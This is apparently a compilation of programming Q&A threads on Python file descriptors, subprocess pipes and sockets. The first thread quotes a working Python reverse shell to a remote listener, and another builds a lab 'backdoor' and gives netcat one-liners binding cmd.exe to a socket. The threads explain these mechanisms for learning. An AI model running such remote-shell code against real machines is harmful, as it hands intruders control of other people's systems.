Understanding how file descriptors in Python work - python

So I have found the following code for a reverse shell in Python:
import socket, subprocess, os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.11.xxx",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
This code basically opens a reverse connection to a remote listener at "10.10.11.xxx".
I do not understand how the input/output of the subprocess call is transferred to the socket via file descriptors.
Everything else until that is clear:
Socket is created
Connection is established
socket file descriptors get copied into standard file descriptors using dup2()
But I do not get how the system knows that it needs to pipe data to those sockets.
Thanks!

That's what os.dup2() does.
os.dup2(s.fileno(), 0)
makes file descriptor 0 refer to the socket. FD 0 is standard input, so when the shell reads its input, it will read from the socket.
os.dup2(s.fileno(), 1)
makes file descriptor 1 refer to the socket. FD 1 is standard output, so when the shell prints something, it will be sent to the socket.
FD 2 is standard error, so error messages will also be written to the socket.
All these descriptors will be inherited by child processes that the shell spawns, so programs that are run from the reverse shell will read and write the socket.
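A minimal standalone sketch (not from the question) showing the same mechanism with an ordinary file standing in for the socket:
import os
import subprocess

# Redirect FD 1 (stdout) into a file, exactly the way the reverse
# shell redirects it into a socket; out.log is just a stand-in.
f = open("out.log", "w")
os.dup2(f.fileno(), 1)

# Both of these end up in out.log: the kernel routes anything written
# to FD 1 there, and the child inherits FD 1 across fork()/exec().
os.write(1, b"from the parent\n")
subprocess.call(["echo", "from the child"])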

Related

Suppress output of subprocess

I want to use the subprocess module to control some processes spawned via ssh.
By searching and testing I found that this works:
import subprocess
import os
import time
node = 'guest@localhost'
my_cmd = ['sleep','1000']
devnull = open(os.devnull, 'wb')
cmd = ['ssh', '-t', '-t', node] + my_cmd
p = subprocess.Popen(cmd, stderr=devnull, stdout=devnull)
while True:
    time.sleep(1)
    print 'Normal output'
The -t -t option I provide allows me to terminate the remote process instead of just the ssh command. But it also scrambles my program's output: newlines are no longer effective, so everything runs together into one long, hard-to-read string.
How can I keep ssh from affecting the formatting of the Python program's output?
Sample output:
guest:~$ python2 test.py
Normal output
Normal output
Normal output
Normal output
Normal output
Normal output
Normal output
(First ctrl-c)
Normal output
Normal output
Normal output
(Second ctrl-c)
^CTraceback (most recent call last):
  File "test.py", line 13, in <module>
    time.sleep(1)
KeyboardInterrupt
Ok, the output is now clear. I do not know exactly why, but the command ssh -t -t puts the local terminal in raw mode. It makes sense anyway, because it is intended to let you directly use curses programs (such as vi) on the remote, and in that case no conversion should be done, not even the simple \n -> \r\n that lets a plain newline leave the cursor in the first column. But I could not find a reference on this in the ssh documentation.
It (-t -t) allows you to kill the remote process because raw mode lets the Ctrl + C reach the remote instead of being processed by the local tty driver.
IMHO, this is a design smell: you are relying on one side effect of the pty allocation (passing Ctrl + C through to the remote) while suffering from another (raw mode on the local system). You should instead process standard input yourself (stdin=subprocess.PIPE) and explicitly send a chr(3) when you read the interrupt character from the local keyboard, or install a signal handler for SIGINT that does it.
Alternatively, as a workaround, you can simply use something like os.system("stty opost -igncr") (or better, its subprocess equivalent) after starting the remote command, to reset the local terminal to an acceptable mode.
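For example, a sketch of both ideas; the subprocess equivalent of the stty workaround, and the signal-handler design from the previous paragraph (guest@localhost and the sleep command are placeholders):
import signal
import subprocess

# Subprocess equivalent of the stty workaround named above: put the
# local terminal back into a sane mode after ssh switched it to raw.
subprocess.call(["stty", "opost", "-igncr"])

# Cleaner design sketch: give ssh a pipe for stdin (so it never touches
# the local terminal mode) and forward Ctrl+C to the remote pty by hand.
p = subprocess.Popen(["ssh", "-t", "-t", "guest@localhost", "sleep", "1000"],
                     stdin=subprocess.PIPE)

def forward_sigint(signum, frame):
    p.stdin.write("\x03")   # chr(3): the remote pty turns ETX into SIGINT
    p.stdin.flush()

signal.signal(signal.SIGINT, forward_sigint)
p.wait()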

python subprocess stdin.write a string error 22 invalid argument

I have two Python files communicating over a socket. When I pass the received data to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines: 1) is running Ubuntu, and I have this code on the server:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
    command_from_user = raw_input("Give your command: ") # read command from the user
    if command_from_user == 'quit': break
    c.send(command_from_user) # sending the command to client
c.close() # Close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
And the error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically, I want to run commands serially from the server on the client and get the output back to the server. The first command is executed; on the second command I get this error message.
The main problem which led me to this solution is the change-directory command: when I execute cd "path", the directory doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput = proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
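A sketch of that first option, reusing the question's s and a (each command gets a fresh cmd.exe, so communicate() is safe):
import subprocess

while True:
    data = s.recv(1024)   # message-boundary caveat: see below
    if data in ("", "quit"):
        break
    # a fresh shell per command, so communicate() may close its pipes
    proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, err = proc.communicate('%s\n' % data)
    print out + err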
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
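A rough sketch of that plumbing, reusing the question's proc and s: one daemon reader thread per pipe, which is essentially what communicate() does internally:
import threading

def pump(pipe, sock):
    # forward everything the shell writes on this pipe to the socket
    for line in iter(pipe.readline, ''):
        sock.sendall(line)

for pipe in (proc.stdout, proc.stderr):
    t = threading.Thread(target=pump, args=(pipe, s))
    t.daemon = True
    t.start()

# the main loop is now free to just feed commands into proc.stdin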
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
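Put together, the client's read loop might look like this; a sketch reusing the question's proc, assuming the newline-delimited protocol described above:
f = s.makefile()
for data in f:                  # one complete, newline-terminated command
    command = data.rstrip('\n')
    if command == 'quit':
        break
    proc.stdin.write('%s\n' % command)
    proc.stdin.flush()
f.close()
s.close()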
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get install netcat. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu box) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever: you can connect up, do some stuff, quit, connect up again later, etc., without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
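For comparison, a sketch with a hypothetical program name: pass the arguments as a list and drop shell=True, and a bad name fails loudly at Popen time instead of somewhere inside the shell:
import subprocess

# Without shell=True the name and arguments travel as a list, and
# Popen itself raises OSError if the program doesn't exist:
proc = subprocess.Popen(['nonexistent-program', '--flag'],
                        stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE)
# OSError: [Errno 2] No such file or directory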
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

How to pipe python socket to a stdin/stdout

I need to write an app that contacts a server. After sending a few initial messages, it should allow the user to interact with the server by sending commands and receiving results.
How should I pipe my current socket so that the user can interact with the server, without me having to read input and write output from/to stdin/stdout myself?
You mean like using netcat?
cat initial_command_file - | nc host port
The answer is: something needs to read and write. In the sample shell script above, cat reads from two sources in sequence and writes to a single pipe; nc reads from that pipe and writes to a socket, but also reads from the socket and writes to its stdout.
So there will always be some reading and writing going on ... however, you can structure your code so that it doesn't intrude into the comms logic.
For example, you can use itertools.chain to create an input iterator that behaves like cat, so your TCP-facing code can take a single input iterable:
import itertools
import socket
import sys

def netcat(input, output, remote):
    """trivial example for a 1:1 request-response protocol"""
    for request in input:
        remote.sendall(request)       # sockets have no .write(); use sendall()
        response = remote.recv(4096)  # ...and recv() instead of .read()
        output.write(response)

handshake = ['connect', 'initial', 'handshake', 'stuff']
cat = itertools.chain(handshake, sys.stdin)
server = ('localhost', 9000)
netcat(cat, sys.stdout, socket.create_connection(server))
You probably want something like pexpect. Basically you'd create a spawn object that initiates the connection (e.g. via ssh), then use that object's expect() and sendline() methods to issue the commands you want to send at the prompts. Then you can use the interact() method to turn control over to the user.
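A sketch of that approach; the host, password, and prompt patterns below are placeholders, not part of the original answer:
import pexpect

child = pexpect.spawn('ssh guest@192.168.2.7')   # hypothetical target
child.expect('password:')
child.sendline('secret')
child.expect(r'\$ ')           # wait for the shell prompt

child.sendline('uname -a')     # scripted part of the session
child.expect(r'\$ ')
print child.before             # everything printed before the prompt

child.interact()               # hand the session over to the user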

Using file descriptors to communicate between processes

I have the following Python code:
import pty
import subprocess
os = subprocess.os
from subprocess import PIPE
import time
import resource

pipe = subprocess.Popen(["cat"], stdin=PIPE, stdout=PIPE, stderr=PIPE,
                        close_fds=True)
skip = [f.fileno() for f in (pipe.stdin, pipe.stdout, pipe.stderr)]
pid, child_fd = pty.fork()
if pid == 0:
    max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
    fd = 3
    while fd < max_fd:
        if fd not in skip:
            try:
                os.close(fd)
            except OSError:
                pass
        fd += 1
    environment = os.environ.copy()
    environment.update({"FD": str(pipe.stdin.fileno())})
    os.execvpe("zsh", ["zsh", "-i", "-s"], environment)
else:
    os.write(child_fd, "echo a >&$FD\n")
    time.sleep(1)
    print pipe.stdout.read(2)
How can I rewrite it so that it will not use Popen and cat? I need a way to pass data from a shell function running in the interactive shell that will not mix with data created by other functions (so I cannot use stdout or stderr).
Ok, I think I've got a handle on your question now, and see two different approaches you could take.
If you absolutely want to provide the shell in the child process with an already-open file descriptor, then you can replace the Popen() of cat with a call to os.pipe(). That will give you a connected pair of real file descriptors (not Python file objects). Anything written to the second file descriptor can be read from the first, replacing your jury-rigged cat-pipe. (Although "cat-pipe" is fun to say...). A socket pair (socket.socketpair()) can also be used to achieve the same end if you need a bidirectional pair.
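A minimal sketch of that substitution, keeping the rest of the question's code intact:
import os

# replaces the Popen(["cat"], ...) plumbing: a connected pair of raw
# file descriptors (not Python file objects)
read_fd, write_fd = os.pipe()

# child side (after pty.fork()): export the write end instead of
# pipe.stdin.fileno(), e.g. environment.update({"FD": str(write_fd)})

# parent side: read what the shell function wrote
# data = os.read(read_fd, 1024)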
Alternatively, you could simplify your life even further by using a named pipe (aka FIFO). If you aren't familiar with the facility, a named pipe is a uni-directional pipe located in the filesystem namespace. The os.mkfifo() function will create the pipe on the filesystem. You can then open the pipe for reading in your primary process and open it for writing / direct output to it from your shell child process. This should simplify your code and open the option of using an existing library like Pexpect to interact with the shell.
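And a sketch of the named-pipe variant; the path is arbitrary:
import os

fifo_path = "/tmp/shell_chan"    # arbitrary location for the FIFO
os.mkfifo(fifo_path)

# child: export the *path* rather than a descriptor, e.g.
#   environment.update({"FIFO": fifo_path})
# and have the shell function run:  echo a > $FIFO

# parent: opening the read end blocks until a writer shows up
fifo = open(fifo_path)
print fifo.readline()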

Python Popen, closing streams and multiple processes

I have some data that I would like to gzip, uuencode and then print to standard out. What I basically have is:
compressor = Popen("gzip", stdin = subprocess.PIPE, stdout = subprocess.PIPE)
encoder = Popen(["uuencode", "dummy"], stdin = compressor.stdout)
The way I feed data to the compressor is through compressor.stdin.write(stuff).
What I really need to do is to send an EOF to the compressor, and I have no idea how to do it.
At some point, I tried compressor.stdin.close() but that doesn't work -- it works well when the compressor writes to a file directly, but in the case above, the process doesn't terminate and stalls on compressor.wait().
Suggestions? In this case, gzip is an example and I really need to do something with piping the output of one process to another.
Note: The data I need to compress won't fit in memory, so communicate isn't really a good option here. Also, if I just run
compressor.communicate("Testing")
after the 2 lines above, it still hangs with the error
File "/usr/lib/python2.4/subprocess.py", line 1041, in communicate
rlist, wlist, xlist = select.select(read_set, write_set, [])
I suspect the issue is with the order in which you open the pipes. UUEncode is funny in that it will whine when you launch it if there's no incoming pipe set up in just the right way (try launching the darn thing on its own in a Popen call, with just PIPE as the stdin and stdout, to see the explosion).
Try this:
encoder = Popen(["uuencode", "dummy"], stdin=PIPE, stdout=PIPE)
compressor = Popen("gzip", stdin=PIPE, stdout=encoder.stdin)
compressor.communicate("UUencode me please")
encoded_text = encoder.communicate()[0]
print encoded_text
begin 644 dummy
F'XL(`%]^L$D``PL-3<U+SD])5<A-52C(24TL3#4`;2O+"!(`````
`
end
You are right, btw... there is no way to send a generic EOF down a pipe. After all, each program really defines its own EOF. The way to do it is to close the pipe, as you were trying to do.
EDIT: I should be clearer about uuencode. As a shell program, its default behaviour is to expect console input. If you run it without a "live" incoming pipe, it will block waiting for console input. By opening the encoder second, before you had sent material down the compressor pipe, the encoder was blocking, waiting for you to start typing. Jerub was right in that there was something blocking.
This is not the sort of thing you should be doing directly in Python; there are eccentricities in how these things work that make it a much better idea to do this with a shell. If you can just use subprocess.Popen("foo | bar", shell=True), then all the better.
What might be happening is that gzip has not been able to output all of its input yet, and the process will not exit until its stdout writes are finished.
You can look at what system call a process is blocking on if you use strace. Use ps auxwf to discover which process is the gzip process, then use strace -p $pidnum to see what system call it is performing. Note that stdin is FD 0 and stdout is FD 1; you will probably see it reading or writing on those file descriptors.
If you just want to compress and don't need the file wrappers, consider using the zlib module:
import zlib
compressed = zlib.compress("text")
Any reason why the shell=True and Unix pipes suggestions won't work?
from subprocess import *
pipes = Popen("gzip | uuencode dummy", stdin=PIPE, stdout=PIPE, shell=True)
for i in range(1, 100):
    pipes.stdin.write("some data")
pipes.stdin.close()
print pipes.stdout.read()
seems to work
